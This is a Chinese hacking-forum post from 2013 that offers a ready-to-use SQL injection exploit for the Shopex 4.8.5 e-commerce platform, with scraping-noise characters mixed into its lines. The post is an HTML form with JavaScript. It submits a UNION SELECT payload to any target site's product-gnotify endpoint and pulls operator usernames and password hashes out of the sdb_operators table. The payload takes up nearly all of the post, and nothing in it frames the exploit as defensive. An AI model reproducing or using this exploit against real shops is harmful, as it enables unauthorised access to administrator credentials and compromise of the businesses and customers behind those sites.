中国网络渗透测试联盟

标题: Shopex 4.8.5 SQL Injection Exp 0day [打印本页]
作者: admin    时间: 2013-1-23 09:20
标题: Shopex 4.8.5 SQL Injection Exp 0day
<center>  ?$ f/ v/ _3 s
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>3 d2 j- ^% k! k- z* q) D4 ^
<form action="" method="post" name="submit_url">" I! h& t1 e- t6 H5 L2 N
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>7 ^# o; {5 a8 W
<input type="hidden" name="goods[goods_id]" value="3">
8 N+ E/ t# l. w% S8 K! a9 v<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
6 p5 R/ L6 a' E2 u+ `+ i; r<input type="submit" value="给我注入"  onclick=fsubmit()>! `0 X- K5 |  u$ I. A
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
$ d2 L5 S% ?3 {5 @3 S. ]
0 a9 B; y  T5 ]+ ]<script>
/ A0 R+ T) H0 _9 efunction fsubmit(){
! t) c( z& h/ v9 y7 lform = document.forms[0]; 7 F- v$ E! k) D% V8 ~4 W
form.action = form.url.value+'/?product-gnotify'; : v" ?1 g2 Z6 e( a6 K( R: p. M
form.submit();
! `: N0 F, Z. T6 i/ Y! h, z}
6 M3 j! O( e# u* q; r6 Y5 t</script>
  H' U3 _9 ~  d0 u+ g0 }



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2